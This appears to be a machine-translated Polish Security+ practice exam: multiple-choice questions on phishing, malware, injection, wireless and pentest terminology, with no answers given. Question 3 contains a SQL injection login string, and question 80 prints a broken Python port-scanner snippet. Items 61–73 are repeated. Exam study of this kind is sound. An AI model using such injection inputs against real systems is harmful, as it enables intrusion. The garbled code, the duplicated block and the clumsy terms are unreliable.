Security+
Zagrożenia, ataki i luki
1. Ahmed jest kierownikiem sprzedaży w dużej firmie ubezpieczeniowej. Otrzymał wiadomość e-mail zachęcającą go do kliknięcia w link i wypełnienia ankiety. Jest podejrzliwy w stosunku do wiadomości e-mail, ale wspomina o dużym stowarzyszeniu ubezpieczeniowym, co sprawia, że myśli, że może to być uzasadnione. Które z poniższych zdań najlepiej opisuje ten atak?
A. Phishing
B. Inżynieria społeczna
C. Spear phishing
D. koń trojański
2. Jesteś administratorem bezpieczeństwa w średniej wielkości banku. Odkryłeś oprogramowanie na serwerze bazy danych swojego banku, którego nie powinno tam być. Wygląda na to, że oprogramowanie zacznie usuwać pliki bazy danych, jeśli konkretny pracownik zostanie zwolniony. Co najlepiej to opisuje?
A. Robak
B. Bomby logiczne
C. koń trojański
D. Rootkit
3. Jesteś odpowiedzialny za reagowanie na incydenty w Acme Bank. Strona Acme Bank została zaatakowana. Atakujący użył ekranu logowania, ale zamiast wprowadzać dane logowania, wprowadził dziwny tekst: ' lub '1' = '1. Jaki jest najlepszy opis tego ataku?
A. Skrypty między witrynami
B. Fałszerstwo żądań między witrynami
C. Wstrzyknięcie SQL
D. Zatrucie ARP
4. Użytkownicy skarżą się, że nie mogą połączyć się z siecią bezprzewodową. Odkrywasz, że punkty WAP są poddawane atakowi bezprzewodowemu, którego celem jest blokowanie ich sygnałów Wi-Fi. Która z poniższych etykiet jest najlepszą etykietą dla tego ataku?
A. IV atak
B. Zagłuszanie
C. Atak WPS
D. Botnet
5. Frank jest głęboko zaniepokojony atakami na serwer handlowy swojej firmy. Szczególnie martwi go cross-site scripting i SQL injection. Które z poniższych najlepiej broniłoby się przed tymi dwoma konkretnymi atakami?
A. Szyfrowany ruch sieciowy
B. Walidacja danych wejściowych
C. Firewall
D. IDS
6. Jesteś odpowiedzialny za bezpieczeństwo sieci w firmie Acme. Użytkownicy zgłaszali, że podczas korzystania z sieci bezprzewodowej dochodzi do kradzieży danych osobowych. Wszyscy twierdzą, że łączą się tylko z korporacyjnym bezprzewodowym punktem dostępowym (AP). Jednak dzienniki dla AP pokazują, że ci użytkownicy nie połączyli się z nim. Które z poniższych może najlepiej wyjaśnić tę sytuację?
A. Przejmowanie sesji
B. Clickjacking
C. Nieuczciwy punkt dostępu
D. Bluejacking
7. Jaki rodzaj ataku polega na tym, że atakujący wprowadzi JavaScript do obszaru tekstowego przeznaczonego dla użytkowników do wprowadzenia tekstu, który będzie oglądany przez innych użytkowników?
A. Wstrzyknięcie SQL
B. Clickjacking
C. Skrypty między witrynami
D. Bluejacking
8. Rick chce, aby ataki brute-force w trybie offline na jego plik z hasłami były bardzo trudne dla atakujących. Która z poniższych nie jest powszechną techniką utrudniania złamania haseł?
A. Użycie soli
B. Użycie papryki
C. Użycie specjalnie zaprojektowanego algorytmu haszującego hasła
D. Szyfrowanie hasła w postaci zwykłego tekstu przy użyciu szyfrowania symetrycznego
9. Jakiego terminu używa się do opisania spamu przesyłanego za pośrednictwem usług przesyłania wiadomości internetowych?
A. SPIM
B.SMSPAM
C. IMSPAM
D. Dwie Twarze
10. Susan analizuje kod źródłowy aplikacji i odkrywa dereferencję wskaźnika i zwraca NULL. Powoduje to, że program próbuje odczytać ze wskaźnika NULL i powoduje błąd segmentacji. Jaki wpływ może to mieć na aplikację?
A. Naruszenie danych
B. Warunek odmowy usługi
C. Pełzanie uprawnień
D. Eskalacja uprawnień
11. Teresa jest kierownikiem ochrony w średniej wielkości firmie ubezpieczeniowej. Otrzymuje telefon od organów ścigania z informacją, że niektóre komputery w jej sieci uczestniczyły w masowym ataku typu "odmowa usługi" (DoS). Teresa jest przekonana, że żaden z pracowników jej firmy nie byłby zamieszany w cyberprzestępczość. Co najlepiej wyjaśniłoby ten scenariusz?
A. Jest to wynik socjotechniki.
B. Wszystkie maszyny mają tylne drzwi.
C. Maszyny to boty.
D. Maszyny są zainfekowane kryptowirusami.
12. Nietypowy ruch sieciowy wychodzący, nieprawidłowości geograficzne i wzrost liczby odczytów bazy danych są przykładami tego, kluczowy element analizy zagrożeń?
A. Analiza predykcyjna
B. OSINT
C. Wskaźniki kompromisu
D. Mapy zagrożeń
13. Chris potrzebuje wglądu w próby połączenia przez zaporę, ponieważ uważa, że uzgadnianie TCP nie działa prawidłowo. Jaka funkcja zarządzania informacjami o zabezpieczeniach i zdarzeniami (SIEM) najlepiej nadaje się do rozwiązywania tego problemu?
A. Przeglądanie raportów
B. Przechwytywanie pakietów
C. Analiza sentymentu
D. Zbieranie i analiza dzienników
14. Chris chce wykryć potencjalne zagrożenie wewnętrzne za pomocą swojego systemu zarządzania informacjami o zabezpieczeniach i zdarzeniami (SIEM). Jaka umiejętność najlepiej odpowiada jego potrzebom?
A. Analiza sentymentu
B. Agregacja logów
C. Monitorowanie bezpieczeństwa
D. Analiza zachowań użytkowników
15. Chris ma setki systemów rozmieszczonych w wielu lokalizacjach i chce lepiej radzić sobie z ilością tworzonych danych. Jakie dwie technologie mogą w tym pomóc?
A. Agregacja logów i kolektory logów
B. Przechwytywanie pakietów i agregacja logów
C. Monitorowanie bezpieczeństwa i kolektory dzienników
D. Analiza nastrojów i analiza zachowań użytkowników
16. Jaki typ zespołu ds. bezpieczeństwa ustala zasady zaangażowania na ćwiczenie z cyberbezpieczeństwa?
A. Niebieska drużyna
B. Biały zespół
C. Fioletowa drużyna
D. Drużyna czerwona
17. Cynthia jest zaniepokojona atakami na interfejs programowania aplikacji (API), który jej firma zapewnia swoim klientom. Co powinna polecić, aby API było używane tylko przez klientów, którzy zapłacili za usługę?
A. Wymagaj uwierzytelnienia.
B. Zainstaluj i skonfiguruj zaporę.
C. Filtruj według adresu IP.
D. Zainstaluj i używaj IPS.
18. Jaki rodzaj ataku polega na wysłaniu większej ilości danych do zmiennej docelowej, niż dane mogą faktycznie pomieścić?
A. Bluesnarfing
B. Przepełnienie bufora
C. Bluejacking
D. Cross-site scripting
19. Przychodzi e-mail z informacją, że Gurvinder ma ograniczony czas na działanie, aby otrzymać pakiet oprogramowania za darmo, a za pierwsze 50 pobrań nie trzeba będzie płacić. Jaka zasada socjotechniki jest wykorzystywana przeciwko niemu?
A. Niedobór
B. Zastraszanie
C. Władza
D. Konsensus
20. Zostałeś poproszony o przetestowanie sieci firmowej pod kątem problemów z bezpieczeństwem. Konkretny test, który przeprowadzasz, obejmuje przede wszystkim korzystanie z automatycznych i półautomatycznych narzędzi do wyszukiwania znanych luk w zabezpieczeniach różnych systemów w Twojej sieci. Które z poniższych najlepiej opisuje ten rodzaj testu?
A. Skanowanie podatności
B. Test penetracyjny
C. Audyt bezpieczeństwa
D. Test bezpieczeństwa
21. Susan chce zmniejszyć prawdopodobieństwo udanych ataków polegających na zbieraniu danych uwierzytelniających za pośrednictwem komercyjnych witryn internetowych swojej organizacji. Która z poniższych nie jest powszechną metodą zapobiegania mającą na celu zatrzymanie zbierania danych uwierzytelniających?
A. Korzystanie z uwierzytelniania wieloskładnikowego
B. Szkolenie świadomości użytkownika
C. Używanie złożonych nazw użytkowników
D. Ograniczenie lub uniemożliwienie korzystania ze skryptów i wtyczek stron trzecich
22. Greg chce uzyskać dostęp do sieci chronionej przez system kontroli dostępu do sieci (NAC), który rozpoznaje adres sprzętowy systemów. Jak może ominąć tę ochronę?
A. Fałszowanie prawidłowego adresu IP.
B. Przeprowadź atak typu "odmowa usługi" na system NAC.
C. Użyj klonowania MAC, aby sklonować prawidłowy adres MAC.
D. Żadne z powyższych
23. Coleen jest administratorem bezpieczeństwa sieci w witrynie aukcyjnej online. Niewielka liczba użytkowników skarży się, że kiedy odwiedzają witrynę, wydaje się, że nie jest to właściwa witryna. Coleen sprawdza i może bez problemu wejść na stronę, nawet z komputerów spoza sieci. Sprawdza również dziennik serwera WWW i nie ma żadnych zapisów, czy ci użytkownicy kiedykolwiek się łączyli. Które z poniższych może najlepiej to wyjaśnić?
A. Porywanie URL
B. Wstrzyknięcie SQL
C. Skrypty między witrynami
D. Fałszerstwo żądań między witrynami
24. Organizacja, w której pracuje Mike, stwierdza, że jedna z ich domen kieruje ruch do witryny konkurenta. Kiedy Mike sprawdza, informacje o domenie zostały zmienione, w tym dane kontaktowe i inne dane administracyjne dla domena. Jeśli domena nie wygasła, co najprawdopodobniej wystąpił?
A. Przejęcie DNS
B. Atak na ścieżce
C. Przejęcie domeny
D. Atak dnia zerowego
25. Mahmoud jest odpowiedzialny za zarządzanie bezpieczeństwem na dużym uniwersytecie. Właśnie przeprowadził analizę zagrożeń dla sieci i na podstawie wcześniejszych incydentów i badań podobnych sieci ustalił, że najbardziej rozpowszechnionym zagrożeniem dla jego sieci są nisko wykwalifikowani napastnicy, którzy chcą włamać się do systemu tylko po to, aby udowodnić, że mogą lub za pewne przestępstwa na niskim poziomie, takie jak zmiana oceny. Który termin najlepiej opisuje tego typu napastnika?
A. Haktywista
B. Amatorzy
C. Insider
D. Script kiddie
26. Czym różni się phishing od ogólnego spamu?
A. Jest wysyłany tylko do określonych osób docelowych.
B. Ma na celu uzyskanie poświadczeń lub innych danych.
C. Wysyłany jest SMS-em.
D. Zawiera złośliwe oprogramowanie w wiadomości.
27. Które z poniższych najlepiej opisuje zbiór komputerów, które zostały naruszone i są kontrolowane z jednego centralnego punktu?
A. Zombienet
B. Botnet
C. Sieć zerowa
D. Attacknet
28. Selah włącza pytanie do swojego procesu składania wniosków o udzielenie zamówienia, w którym zadaje sobie pytanie, jak długo sprzedawca prowadzi działalność i ilu ma obecnych klientów. Jakiemu wspólnemu problemowi ma zapobiegać ta praktyka?
A. Kwestie bezpieczeństwa łańcucha dostaw
B. Brak wsparcia dostawcy
C. Zewnętrzne problemy związane z tworzeniem kodu
D. Problemy z integracją systemu
29. John przeprowadza test penetracyjny sieci klienta. Obecnie zbiera informacje z takich źródeł jak archive.org, netcraft.com, media społecznościowe i serwisy informacyjne. Co najlepiej opisuje ten etap?
A. Aktywny rekonesans
B. Zwiad pasywny
C. Początkowa eksploatacja
D. Pivot
30. Alicja chce zapobiec atakom SSRF. Które z poniższych nie będą pomocne w zapobieganiu im?
A. Usuwanie całego kodu SQL z przesłanych zapytań HTTP
B. Blokowanie nazw hostów, takich jak 127.0.01 i localhost
C. Blokowanie wrażliwych adresów URL, takich jak /admin
D. Stosowanie filtrów wejściowych opartych na białej liście
31. Jaki rodzaj ataku opiera się na wprowadzaniu fałszywych wpisów do serwera nazwy domeny sieci docelowej?
A. Zatrucie DNS
B. Zatrucie ARP
C. Zatrucie XSS
D. Zatrucie CSRF
32. Frank został poproszony o przeprowadzenie testu penetracyjnego małej firmy księgowej. Na potrzeby testu otrzymał tylko nazwę firmy, nazwę domeny dla ich witryny internetowej oraz adres IP routera bramy. Co najlepiej opisuje ten rodzaj testu?
A. Znany test środowiskowy
B. Test zewnętrzny
C. Test nieznanego środowiska
D. Test zagrożenia
33. Pracujesz dla firmy ochroniarskiej, która przeprowadza testy penetracyjne dla klientów. Przeprowadzasz test firmy e-commerce. Odkrywasz, że po zhakowaniu serwera WWW możesz użyć serwera WWW do przeprowadzenia drugiego ataku na wewnętrzną sieć firmy. Co najlepiej to opisuje?
A. Atak wewnętrzny
B. Znane testy środowiskowe
C. Testowanie w nieznanym środowisku
D. Ośka
34. Badając epidemię złośliwego oprogramowania w sieci firmowej, odkrywasz coś bardzo dziwnego. Istnieje plik, który ma taką samą nazwę jak biblioteka DLL systemu Windows, a nawet ma ten sam interfejs API, ale obsługuje dane wejściowe w bardzo inny sposób, aby pomóc w złamaniu systemu, i wygląda na to, że aplikacje się do niego przyłączają pliku, a nie rzeczywistej systemowej biblioteki DLL. Co najlepiej to opisuje?
A. Podkładki
B. koń trojański
C. Backdoor
D. Refaktoryzacja
35. Która z poniższych funkcji nie jest kluczową częścią narzędzia SOAR (organizacja bezpieczeństwa, automatyzacja i reagowanie)?
A. Zarządzanie zagrożeniami i podatnościami
B. Reakcja na incydent związany z bezpieczeństwem
C. Zautomatyzowana analiza złośliwego oprogramowania
D. Automatyzacja operacji bezpieczeństwa
36. Jan odkrywa, że poczta e-mail z serwerów pocztowych jego firmy jest blokowana z powodu spamu wysłanego z zaatakowanego konta. Jakiego typu wyszukiwania może użyć, aby określić, jacy dostawcy, tacy jak McAfee i Barracuda, sklasyfikowali jego domenę?
A. nslookup
B. Zrzut TCP
C. Wyszukiwanie reputacji domeny
D. SMTP whois
37. Frank jest administratorem sieci w małej uczelni. Odkrywa, że kilka komputerów w jego sieci jest zainfekowanych złośliwym oprogramowaniem. To złośliwe oprogramowanie wysyła powódź pakietów do celu znajdującego się poza siecią. Co najlepiej opisuje ten atak?
A. Powódź SYN
B. DDoS
C. Botnet
D. Backdoor
38. Dlaczego SSL usuwa szczególne zagrożenie w otwartych sieciach Wi-Fi?
A. WPA2 nie jest wystarczająco bezpieczne, aby temu zapobiec.
B. Otwarte hotspoty nie potwierdzają swojej tożsamości w bezpieczny sposób.
C. Otwarte hotspoty są dostępne dla każdego użytkownika.
D. 802.11ac jest niezabezpieczony i ruch można przekierować.
39. Kierownik sprzedaży w Twojej firmie narzeka na niską wydajność swojego komputera. Po dokładnym zbadaniu problemu na jego komputerze znajduje się oprogramowanie szpiegujące. Twierdzi, że jedyną rzeczą, jaką ostatnio pobrał, była bezpłatna aplikacja do handlu akcjami. Co najlepiej wytłumaczy tę sytuację?
A. Bomba logiczna
B. koń trojański
C. Rootkit
D. Wirus makro
40. Kiedy ataki phishingowe są tak skoncentrowane, że celują w konkretną osobę o wysokiej randze lub ważną osobę, nazywa się je jak?
A. Spear phishing
B. Ukierunkowany phishing
C. Phishing
D. Wielorybnictwo
41. Jaki rodzaj cyberprzestępców najprawdopodobniej kieruje się chęcią zysku przez swoje złośliwe działania?
A. Podmioty państwowe
B. Dzieciaki skryptowe
C. Haktywiści
D. Syndykaty przestępcze
42. Jeden z użytkowników nie może przypomnieć sobie hasła do swojego laptopa. Chcesz odzyskać dla nich to hasło. Zamierzasz użyć popularne wśród hakerów narzędzie/technikę, które polega na przeszukiwaniu tabel wstępnie obliczonych skrótów w celu odzyskania hasła. Co najlepiej to opisuje?
A. Tęczowatabela
B. Backdoor
C. Inżynieria społeczna
D. Atak słownikowy
43. Jakie ryzyko jest często związane z brakiem wsparcia dostawcy dla produktu, takiego jak przestarzała wersja urządzenia?
A. Niewłaściwe przechowywanie danych
B. Brak poprawek lub aktualizacji
C. Brak dostępnej dokumentacji
D. Problemy z integracją systemu i konfiguracją
44. Zauważyłeś, że w zatłoczonym miejscu czasami dostajesz strumień niechcianych wiadomości tekstowych. Wiadomości kończą się, gdy opuścisz obszar. Co opisuje ten atak?
A. Bluejacking
B. Bluesnarfing
C. Zły bliźniak
D. Nieuczciwy punkt dostępu
45. Dennis wykorzystuje atak on-path, aby spowodować, że system wyśle ruch HTTPS do swojego systemu, a następnie przekaże go do rzeczywistego serwera, dla którego ruch jest przeznaczony. Jaki typ ataku na hasło może postępować z danymi, które zbiera, jeśli przechwytuje cały ruch z formularza logowania?
A. Atak na hasło w postaci zwykłego tekstu
B. Atak typu pass-the-hash
C. Atak wstrzykiwania SQL
D. Atak cross-site scripting
46. Ktoś grzebał w koszach na śmieci w Twojej firmie, szukając dokumentów, diagramów lub innych poufnych informacji, które zostały wyrzucone. Jak to się nazywa?
A. Nurkowanie w śmietniku
B. Nurkowanie na śmieci
C. Inżynieria społeczna
D. Inżynieria śmieci
47. Louis prowadzi śledztwo w sprawie incydentu ze złośliwym oprogramowaniem na jednym z komputerów w jego sieci. Odkrył nieznane oprogramowanie który wydaje się otwierać port, pozwalając komuś zdalnie podłączyć do komputera. Wydaje się, że to oprogramowanie zostało zainstalowane w tym samym czasie, co mała aplikacja shareware. Które z poniższych stwierdzeń najlepiej opisuje to złośliwe oprogramowanie?
A RAT
B. Robak
C. Bomba logiczna
D. Rootkit
48. Jared odpowiada za bezpieczeństwo sieci w swojej firmie. Odkrył zachowanie na jednym komputerze, które z pewnością wydaje się być wirusem. Zidentyfikował nawet plik, który jego zdaniem może być wirusem. Jednak przy użyciu trzech oddzielnych programów antywirusowych stwierdza, że żaden nie jest w stanie wykryć pliku. Która z poniższych sytuacji jest najbardziej prawdopodobna?
A. Komputer ma RAT.
B. Komputer ma exploita zero-day.
C. Komputer ma robaka.
D. Komputer ma rootkita.
49. Które z poniższych nie jest powszechnym sposobem atakowania identyfikatorów RFID?
A. Przechwytywanie danych
B. Podszywanie się
C. Odmowa usługi
D. Ataki urodzinowe
50. Twoja sieć bezprzewodowa została naruszona. Wygląda na to, że atakujący zmodyfikował część danych używanych z szyfrem strumieniowym i wykorzystał to do ujawnienia bezprzewodowo zaszyfrowanych danych. Jak nazywa się ten atak?
A. Zły bliźniak
B. Nieuczciwy WAP
C. IV atak
D. Atak WPS
51. Firma, w której pracuje Scott, doświadczyła naruszenia bezpieczeństwa danych i ujawniono dane osobowe tysięcy klientów. Która z poniższych kategorii nie a wpływu na problem, , jak opisano w tym scenariuszu?
A. Finansowe
B. Reputacja
C. Utrata dostępności
D. Utrata danych
52. Jaki rodzaj ataku wykorzystuje zaufanie, jakie witryna ma do uwierzytelnionego użytkownika, który zaatakuje tę witrynę przez fałszowanie żądań od zaufanego użytkownika?
A. Skrypty między witrynami
B. Fałszerstwo żądań między witrynami
C. Bluejacking
D. Zły bliźniak
53. Jakiemu celowi w działaniach cyberwywiadowczych służy centrum fuzji?
A. Promuje wymianę informacji między agencjami lub organizacje.
B. Łączy technologie bezpieczeństwa w celu tworzenia nowych, potężniejszych narzędzi.
C. Generuje moc dla lokalnej społeczności w bezpieczny sposób.
D. Oddziela informacje według ocen klasyfikacyjnych, aby uniknąć przypadkowej dystrybucji.
54. CVE jest przykładem jakiego rodzaju kanału?
A. Kanał informacji o zagrożeniach
B. Kanał podatności
C. Kanał z listą infrastruktury krytycznej
D. Kanał wykorzystujący luki w wirtualizacji o znaczeniu krytycznym
55. Jakim rodzajem ataku jest atak urodzinowy?
A. Atak socjotechniczny
B. Atak kryptograficzny
C. Atak sieciowy typu "odmowa usługi"
D. Atak na protokół TCP/IP
56. Juanita jest administratorem sieci firmy Acme. Niektórzy użytkownicy skarżą się, że są wyrzucani z sieci. Kiedy Juanita sprawdza dzienniki punktu dostępu bezprzewodowego (WAP), stwierdza, że pakiet deauthentication został wysłany do punktu WAP z adresów IP użytkowników. Co się tutaj dzieje?
A. Problem z konfiguracją Wi-Fi użytkowników
B. Atak dysocjacyjny
C. Przejmowanie sesji
D. Atak tylnymi drzwiami
57. John odkrył, że atakujący próbuje uzyskać dostęp do sieci za pomocą oprogramowania, które próbuje wprowadzić kilka haseł z listy popularnych haseł. Jaki to rodzaj ataku?
A. Słownikowy
B. Tęczowa tabela
C. Brute force
D. Przejęcie sesji
58. Jesteś administratorem bezpieczeństwa sieci w banku. Odkrywasz, że atakujący wykorzystał lukę w OpenSSL i zmusił niektóre połączenia do przejścia na wersję TLS ze słabym zestawem szyfrów, którą atakujący może naruszyć. Jaki to był atak?
A. Atak dysocjacyjny
B. Atak downgrade
C. Przejmowanie sesji
D. Brutalna siła
59. Jaki to rodzaj ataku, gdy atakujący próbuje znaleźć wartość wejściową, która da taki sam skrót jak hasło?
A. Tęczowa tabela
B. Brutalna siła
C. Przejmowanie sesji
D. Atak kolizyjny
60. Farès jest administratorem bezpieczeństwa sieci w firmie, która: tworzy zaawansowane routery i przełączniki. Odkrył, że sieci jego firmy były przez pewien czas poddawane serii zaawansowanych ataków. Co najlepiej opisuje ten atak?
A. DDoS
B. Brutalna siła
C. APT
D. Atak dysocjacyjny
61. Jaki rodzaj informacji jest phishingiem, który nie jest powszechnie przeznaczony do nabycia?
A. Hasła
B. Adresy e-mail
C. Numery kart kredytowych
D. Dane osobowe
62. John uruchamia IDS w swojej sieci. Użytkownicy czasami zgłaszają, że system IDS oznacza legalny ruch jako atak. Co to opisuje?
A. Fałszywe pozytywne
B. Fałszywy negatyw
C. Fałszywy wyzwalacz
D. Fałszywa flaga
63. Scott odkrywa, że złośliwe oprogramowanie zostało zainstalowane na jednym z systemów, za które jest odpowiedzialny. Wkrótce potem hasła używane przez użytkownika, do którego przypisany jest system, zostają odkryte jako używane przez atakujących. Jakiego typu złośliwego programu powinien szukać Scott w zaatakowanym systemie?
A. Rootkit
B. Keylogger
C. Robak
D. Żadne z powyższych
64. Przeprowadzasz test penetracyjny sieci swojej firmy. W ramach testu otrzymasz login z minimalnym dostępem i spróbujesz uzyskać dostęp administracyjny na tym koncie. Jak to się nazywa?
A. Eskalacja uprawnień
B. Przejmowanie sesji
C. Chwytanie korzeni
D. Wspinaczka
65. Matt odkrywa, że system w jego sieci wysyła setki ramek Ethernet do przełącznika, do którego jest podłączony, przy czym każda ramka zawiera inny źródłowy adres MAC. Jaki rodzaj ataku odkrył?
A. Spam eterowy
B. Zalanie MAC
C. Podszywanie się pod sprzęt
D. Haszowanie MAC
66. Spyware jest przykładem jakiego rodzaju złośliwego oprogramowania?
A. Trojan
B. PUP
C. RAT
D. Oprogramowanie ransomware
67. Mary odkryła, że aplikacja internetowa używana przez jej firmę nie zawsze prawidłowo obsługuje wielowątkowość, szczególnie gdy wiele wątków ma dostęp do tej samej zmiennej. Może to umożliwić osobie atakującej, która odkryła tę lukę, jej wykorzystanie i awarię serwera. Jaki rodzaj błędu odkryła Mary?
A. Przepełnienie bufora
B. Bomba logiczna
C. Warunki wyścigu
D. Niewłaściwa obsługa błędów
68. Atakujący próbuje uzyskać dostęp do Twojej sieci. Wysyła użytkownikom w Twojej sieci link do nowej gry ze zhakowanym programem z kodem licencyjnym. Jednak pliki gry zawierają również oprogramowanie, które zapewni atakującemu dostęp do dowolnej maszyny, na której jest jest zainstalowany. Jaki to rodzaj ataku?
A. Rootkit
B. koń trojański
C. Oprogramowanie szpiegujące
D. Wirus sektora rozruchowego
69. Poniższy obraz przedstawia raport z systemu OpenVAS.
Jaki typ słabej konfiguracji jest tutaj pokazany?
A. Słabe szyfrowanie
B. Niezabezpieczone konta administracyjne
C. Otwarte porty i usługi
D. Niezabezpieczone protokoły
70. Podczas przeprowadzania testu penetracyjnego Annie skanuje systemy w sieci, do której uzyskała dostęp. Odkrywa inny system w tej samej sieci, który ma takie same konta i typy użytkowników jak ten, w którym się znajduje. Ponieważ ma już ważne konto użytkownika w systemie, do którego już uzyskała dostęp, może się do niego zalogować. Jaki to rodzaj techniki?
A. Ruch boczny
B. Eskalacja uprawnień
C. Zachowanie przywilejów
D. Ruch pionowy
71. Amanda skanuje serwer Red Hat Linux, który jej zdaniem jest w pełni załatany, i odkrywa, że wersja Apache na serwerze jest zgłoszona jako podatna na exploit sprzed kilku miesięcy. Kiedy sprawdza, czy brakuje jej łatek, Apache jest w pełni załatany. Co się stało?
A. Fałszywy wynik pozytywny
B. Awaria automatycznej aktualizacji
C. Fałszywy wynik negatywny
D. Niezgodność wersji Apache
72. Jeśli program posiada zmienne, zwłaszcza tablice, i nie sprawdza wartości granicznych przed wprowadzeniem danych, na jaki atak jest podatny program?
A. XSS
B. CSRF
C. Przepełnienie bufora
D. Bomba logiczna
73. Tracy obawia się, że oprogramowanie, które chce pobrać, może nie być godne zaufania, więc szuka go i znajduje wiele wpisów twierdzących, że oprogramowanie jest legalne. Jeśli zainstaluje oprogramowanie, a później odkryje, że jest złośliwe i że złośliwi aktorzy umieścili te recenzje, jakiej zasady socjotechniki użyli?
A. Niedobór
B. Znajomość
C. Konsensus
D. Zaufanie
74. Które z poniższych najlepiej opisuje złośliwe oprogramowanie, które zostanie uruchomione jak złośliwa aktywność po spełnieniu określonego warunku (tj. jeśli warunek jest spełniony, a następnie wykonywany)?
A. Wirus sektora rozruchowego
B. Bomba logiczna
C. Przepełnienie bufora
D. Rzadki wirus infekujący
75. Jaki termin opisuje stosowanie taktyk konwersacyjnych jako części ćwiczeń socjotechnicznych w celu wyodrębnienia informacji z celów?
A. Preteksty
B. Pozyskiwanie
C. Podszywanie się
D. Zastraszanie
76. Telnet, RSH i FTP to przykłady czego?
A. Protokoły przesyłania plików
B. Niezabezpieczone protokoły
C. Podstawowe protokoły
D. Otwarte porty
77. Scott chce ustalić, skąd można uzyskać dostęp do sieci bezprzewodowej organizacji. Jakie techniki testowania są jego najbardziej prawdopodobnymi opcjami?
A. OSINT i aktywne skany
B. Jazda wojenna i latanie wojenne
C. Socjotechnika i aktywne skany
D. OSINT i prowadzenie wojny
78. Gerald jest administratorem sieci w małej firmie świadczącej usługi finansowe. Użytkownicy zgłaszają dziwne zachowanie, które wydaje się być spowodowane przez wirusa na ich komputerach. Po odizolowaniu maszyn, które według niego są zainfekowane, Gerald analizuje je. Odkrył, że wszystkie zainfekowane maszyny otrzymały wiadomość e-mail rzekomo pochodzącą z księgowości z arkuszem kalkulacyjnym Excel, a użytkownicy otworzyli arkusz kalkulacyjny. Jaki jest najbardziej prawdopodobny problem na tych maszynach?
A. Wirus makro
B. Wirus sektora rozruchowego
C. Koń trojański
D. RAT
79. Twoja firma wynajęła zewnętrzną firmę ochroniarską do wykonania różnych testów Twojej sieci. Podczas skanowania podatności udostępnisz tej firmie loginy do różnych systemów (tj. serwera bazy danych, serwera aplikacji, serwera WWW itp.), aby pomóc w ich skanowaniu. Co najlepiej to opisuje?
A. Znany test środowiskowy
B. Test szarej skrzynki
C. Poświadczony skan
D. Skanowanie inwazyjne
80. Steve odkrywa następujący kod w systemie. W jakim języku jest napisane i do czego służy?
import socket as skt
for port in range (1,9999):
try:
sc=skt.socket(askt.AF_INET,skt.SOCK_STREAM)
sc.settimeout(900)
sc.connect(('127.0.0.1,port))
print '%d:OPEN' % (port)
sc.close
except: continue
A. Perl, skanowanie podatności
B. Python, skanowanie portów
C. Bash, skanowanie podatności
D. PowerShell, skanowanie portów
61. Jaki rodzaj informacji jest phishingiem, który nie jest powszechnie przeznaczony do nabycia?
A. Hasła
B. Adresy e-mail
C. Numery kart kredytowych
D. Dane osobowe
62. John uruchamia IDS w swojej sieci. Użytkownicy czasami zgłaszają, że system IDS oznacza legalny ruch jako atak. Co to opisuje?
A. Fałszywe pozytywne
B. Fałszywy negatyw
C. Fałszywy wyzwalacz
D. Fałszywa flaga
63. Scott odkrywa, że złośliwe oprogramowanie zostało zainstalowane na jednym z systemów, za które jest odpowiedzialny. Wkrótce potem hasła używane przez użytkownika, do którego przypisany jest system, zostają odkryte jako używane przez atakujących. Jakiego typu złośliwego programu powinien szukać Scott w zaatakowanym systemie?
A. Rootkit
B. Keylogger
C. Robak
D. Żadne z powyższych
64. Przeprowadzasz test penetracyjny sieci swojej firmy. W ramach testu otrzymasz login z minimalnym dostępem i spróbujesz uzyskać dostęp administracyjny na tym koncie. Jak to się nazywa?
A. Eskalacja uprawnień
B. Przejmowanie sesji
C. Chwytanie korzeni
D. Wspinaczka
65. Matt odkrywa, że system w jego sieci wysyła setki ramek Ethernet do przełącznika, do którego jest podłączony, przy czym każda ramka zawiera inny źródłowy adres MAC. Jaki rodzaj ataku odkrył?
A. Spam eterowy
B. Zalanie MAC
C. Podszywanie się pod sprzęt
D. Haszowanie MAC
66. Spyware jest przykładem jakiego rodzaju złośliwego oprogramowania?
A. Trojan
B. PUP
C. RAT
D. Oprogramowanie ransomware
67. Mary odkryła, że aplikacja internetowa używana przez jej firmę nie zawsze prawidłowo obsługuje wielowątkowość, szczególnie gdy wiele wątków ma dostęp do tej samej zmiennej. Może to umożliwić osobie atakującej, która odkryła tę lukę, jej wykorzystanie i awarię serwera. Jaki rodzaj błędu odkryła Mary?
A. Przepełnienie bufora
B. Bomba logiczna
C. Warunki wyścigu
D. Niewłaściwa obsługa błędów
68. Atakujący próbuje uzyskać dostęp do Twojej sieci. Wysyła użytkownikom w Twojej sieci link do nowej gry ze zhakowanym programem z kodem licencyjnym. Jednak pliki gry zawierają również oprogramowanie, które zapewni atakującemu dostęp do dowolnej maszyny, na której jest jest zainstalowany. Jaki to rodzaj ataku?
A. Rootkit
B. koń trojański
C. Oprogramowanie szpiegujące
D. Wirus sektora rozruchowego
69. Poniższy obraz przedstawia raport z systemu OpenVAS.
Jaki typ słabej konfiguracji jest tutaj pokazany?
A. Słabe szyfrowanie
B. Niezabezpieczone konta administracyjne
C. Otwarte porty i usługi
D. Niezabezpieczone protokoły
70. Podczas przeprowadzania testu penetracyjnego Annie skanuje systemy w sieci, do której uzyskała dostęp. Odkrywa inny system w tej samej sieci, który ma takie same konta i typy użytkowników jak ten, w którym się znajduje. Ponieważ ma już ważne konto użytkownika w systemie, do którego już uzyskała dostęp, może się do niego zalogować. Jaki to rodzaj techniki?
A. Ruch boczny
B. Eskalacja uprawnień
C. Zachowanie przywilejów
D. Ruch pionowy
71. Amanda skanuje serwer Red Hat Linux, który jej zdaniem jest w pełni załatany, i odkrywa, że wersja Apache na serwerze jest zgłoszona jako podatna na exploit sprzed kilku miesięcy. Kiedy sprawdza, czy brakuje jej łatek, Apache jest w pełni załatany. Co się stało?
A. Fałszywy wynik pozytywny
B. Awaria automatycznej aktualizacji
C. Fałszywy wynik negatywny
D. Niezgodność wersji Apache
72. Jeśli program posiada zmienne, zwłaszcza tablice, i nie sprawdza wartości granicznych przed wprowadzeniem danych, na jaki atak jest podatny program?
A. XSS
B. CSRF
C. Przepełnienie bufora
D. Bomba logiczna
73. Tracy obawia się, że oprogramowanie, które chce pobrać, może nie być godne zaufania, więc szuka go i znajduje wiele wpisów twierdzących, że oprogramowanie jest legalne. Jeśli zainstaluje oprogramowanie, a później odkryje, że jest złośliwe i że złośliwi aktorzy umieścili te recenzje, jakiej zasady socjotechniki użyli?
A. Niedobór
B. Znajomość
C. Konsensus
D. Zaufanie
